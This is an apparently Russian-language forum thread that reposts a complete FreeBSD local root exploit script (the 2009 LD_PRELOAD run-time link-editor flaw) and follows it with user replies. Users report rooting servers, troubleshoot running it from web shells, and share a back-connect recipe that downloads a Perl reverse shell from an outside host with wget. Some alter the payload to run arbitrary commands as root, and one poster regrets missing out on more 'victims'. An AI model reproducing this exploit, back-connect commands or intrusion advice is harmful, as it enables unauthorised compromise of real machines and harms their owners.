###############################
# EDB-ID: 10255
# CVE-ID: ()
# Title: FreeBSD Run-Time Link-Editor Local r00t Zeroday
# Author: Kingcope
# Published: 2009-11-30
###############################

Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

http://www.exploit-db.com/exploits/10255

Потестил на 6.4-RELEASE-p7 #7 - не пашет. Буду тестить дальше.

7.0 поестил результат рут)
Тс респект)
7.2 тоже.

7.1 рутит

закинте плз в откомпелированом виде)

7.1 Срутил.Спасибо.

сам експлоит

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env




7.1 - взяло рут
6.4 - не взяло

добряк, ТС, добряк
спасибо, порутал

FreeBSD 7.1-RELEASE-p5
рут - успешно

У меня он не запускается, пишет, что файл не найден...
Мои действия:
$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory

У меня он не запускается, пишет, что файл не найден...
Мои действия:
$ cd /tmp
$ wget http://myhost.ru/w00t.sh
$ chmod 777 w00t.sh
$ ./w00t.sh
: No such file or directory


Либо нету доступа к gcc, либо к sh. Права на папку скорее всего есть. У меня зарутил 1 раз и 30 :D.
Открой сам этот плоент, и сделай все ручками, там элементарно, но вряд ли выйдет)

$ which gcc sh
/usr/bin/gcc
/usr/bin/sh

$ which gcc sh
/usr/bin/gcc
/usr/bin/sh

Загляни в сам файл .sh, посмотри какие в итоге файоы должны были создаться и посмотри, все ли создалось, если нет, значит нет прав.

readmanpage.... сделай исполяемым

есть еще чудная команда ls кароч читаете маны.

поставь на файл права chmod 777 имя файла

порутал FreeBSD 7.0-RELEASE-p7,

спасибо!

(Скрипт выполнял вручную, пошагово. Пакет не сработал, скорее всего, из-за отсутствия chmod +x env)

Запустил w00d.sh, появилось 2 файла env.c и program.c, что дальше делать?

Если sh не работает, то лучше сделать всё руками. Сразу увидишь в каком месте не работает.

Если у тебя кроме *.c больше ничего не появилось, то в системе не установлен gcc

не было доступа к sh, сделал ручками на бэкконнекте...

FreeBSD 7.2 взял)

ой как славненько 7.0 рут :)thx давно хотел этот сервак порутить )))

система 7.2-RELEASE FreeBSD в локалке, есть доступ по шеллу(WSO).
сплоит в /tmp/ ,чмод 777
после sh w00d.sh появляются 3 файла: env , env.c , program.c .
Выше мне сказали, что не установлен gcc.
Как установить gcc?(Выхода в инет нету, только локалка)
Что должно произойти после удачного исполнение сплоита?
Пожалуйста помогите.

сплоит из консоли ВСО2 нельзя исполнять, нужно и биндшелла или бекконнекта...

wkar, без рута ты не установишь gcc. Варинат скомпилировать на другой фряхе и залить туда уже бинарник. И тебе нужно вернуть себе бек конект как сказал Тузик.

ещё можна проверить наличие gcc командой: gcc --help и я могу дать скомпиленые бинарники, но обязательно нужен или биндшелл или бекконнект

gcc нет, это точно."я могу дать скомпиленые бинарники"Если можешь то дай, буду благодарен.
И ещё, дайте немного маны, как зделать бекконнект.

у себя
netcat -l -n -v -p 5995

на хосте
wget -O ngix http://fsb-my.name/c/apache-handler
perl ngix your_ip 5995 2> /dev/null &

спасибо за бекдор, поделитесь ещё кто-то скомпилированными бинарниками.

А есть у кого на 6.2 ??

возможно что-то сделать? :( хз что делать..


./qwe.sh
./qwe: Permission denied


6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Mon Nov 12 17:30:06 EET 2007

пожалуйста выложите скомпиленный сплоит (((((никак скомпилить не могу (((( Спасибо

Ты наврено запускаешь из /tmp а он примантирован как no ex, корчое скопируй в другую папку куда-нить. Правда я неуверен что возьмёт 6.2 но попробуй , отпишись.

З.Ы. Есть вариант что надо сделать chmod 755 на твой скрипт.

GizmoSB, у меня ниразу не получилось скомпилить со скрипта, компиль просто кусками. Из скрипта скопируй куски кода и скомпиль.

На самом деле бэкконнект не всегда получается делать. В этом случае можно немного поправить сплойт:
system("echo ALEX-ALEX;/bin/sh");
на system("echo ALEX-ALEX;/bin/sh cmd.sh");
после повышения привелегий сплойт будет вполнять команды из cmd.sh под рутом.
Запуск сплойта в вебшеле: w00t.sh &> out.txt. Перенаправление лучше делать потому, что веб шел не выводит stderr поток и мы не увидим ошибок. Результат читаем из out.txt.

на хосте
wget -O ngix http://fsb-my.name/c/apache-handler
perl ngix your_ip 5995 2> /dev/null &
возможно ли вместо wget использовать $_GET?
т.е. чисто на пхп, не используя консольные команды
возможно ли какнибудь запустить на хосте то что накомпелено в домашних условия, при услонии что не работает с/перл/командная строка
+ нет доступа к папкам до /public_html/
в этой ситуации можно получить рут? :confused:

возможно ли вместо wget использовать $_GET?
Возможно ли использовать вместо программы-качалки массив из высокоуровниевого языка?
Возможно ли использовать вместо бензопилы бабушикины спицы, правда они погнулись?
Возможно ли швее-мотористке проектировать ядерные реакторы?

Если включен сеф мод и\или вырублены нужные функции - гугли вначале обход этих ограничений.

:.']возможно что-то сделать? :( хз что делать..


./qwe.sh
./qwe: Permission denied


6.2-RELEASE-p8 FreeBSD 6.2-RELEASE-p8 #0: Mon Nov 12 17:30:06 EET 2007

Скорее всего noexec флаг.
mount или /etc/fstab глянь и выбери диру другую

chmod +x filename

Скорее всего noexec флаг.
mount или /etc/fstab глянь и выбери диру другую

6-ку не берёт вроде этот сплойт

кто поможет порутать 8?

7.2-RELEASE-p3 FreeBSD 7.2-RELEASE-p3 рутанул сегодня вот такой сервачок )
при срабатывании сплоита в констоль выкинуло вот это
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
До этого много серваков с подходящими версиями не хотели рутаться
Эх жаль я профукал появление этого сплоита в декабре, жертв было бы гораздо больше )

через sh не получилось,кто может помоч по кускам выполнить стукните 600-zero91-642